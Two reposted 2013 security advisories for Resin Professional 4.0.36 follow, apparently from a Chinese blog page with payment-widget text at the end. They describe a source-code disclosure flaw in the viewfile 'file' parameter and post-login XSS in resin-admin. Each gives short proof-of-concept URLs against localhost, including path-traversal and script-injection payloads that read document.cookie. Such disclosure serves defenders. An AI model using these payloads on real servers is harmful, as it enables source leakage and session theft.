Resin Application Server 4.0.36 Source Code Disclosure

Resin Application Server 4.0.36 Source Code Disclosure Vulnerability


Vendor: Caucho Technology, Inc.
Product web page: http://www.caucho.com
Affected version: Resin Professional Web And Application Server 4.0.36

Summary: Resin is the Java Application Server for high traffic
sites that require speed and scalability. It is one of the earliest
Java Application Servers, and has stood the test of time due to
engineering prowess.

Desc: The vulnerability is caused do to an improper sanitization
of the 'file' parameter when used for reading help files. An
attacker can exploit this vulnerability by directly requesting
a '.jsp' file for example in the root directory of the server
to view its source code that might reveal sensitive information.

Tested on: Resin Professional 4.0.36 (built Fri, 26 Apr 2013 03:33:09 PDT)
           Java HotSpot(TM) 64-Bit Server VM 23.3-b01
           4 cpu, Windows 7 amd64 6.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5144
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5144.php


01.06.2013

--


http://127.0.0.1:8080/resin-doc/viewfile/?file=index.jsp
http://127.0.0.1:8080/resin-doc/viewfile/?contextpath=/.\../&servletpath=&file=index.jsp
http://127.0.0.1:8080/resin-doc/viewfile/?contextpath=/.&servletpath=&file=index.jsp
 
 
Resin Application Server 4.0.36 Cross-Site Scripting Vulnerabilities


Vendor: Caucho Technology, Inc.
Product web page: http://www.caucho.com
Affected version: Resin Professional Web And Application Server 4.0.36

Summary: Resin is the Java Application Server for high traffic
sites that require speed and scalability. It is one of the earliest
Java Application Servers, and has stood the test of time due to
engineering prowess.

Desc: Resin Application and Web Server The plugin suffers from a XSS
issue due to a failure to properly sanitize user-supplied input to
the 'logout' GET parameter in the 'index.php' script. URI-based XSS
issue is also present and both of the vulnerabilities can be triggered
once the user/admin is logged in (post-auth). Attackers can exploit
this weakness to execute arbitrary HTML and script code in a user's
browser session.

Tested on: Resin Professional 4.0.36 (built Fri, 26 Apr 2013 03:33:09 PDT)
           Java HotSpot(TM) 64-Bit Server VM 23.3-b01
           4 cpu, Windows 7 amd64 6.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5143
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5143.php


01.06.2013

--


http://127.0.0.1:8080/resin-admin/?q=index.php&logout=true%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://127.0.0.1:8080/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值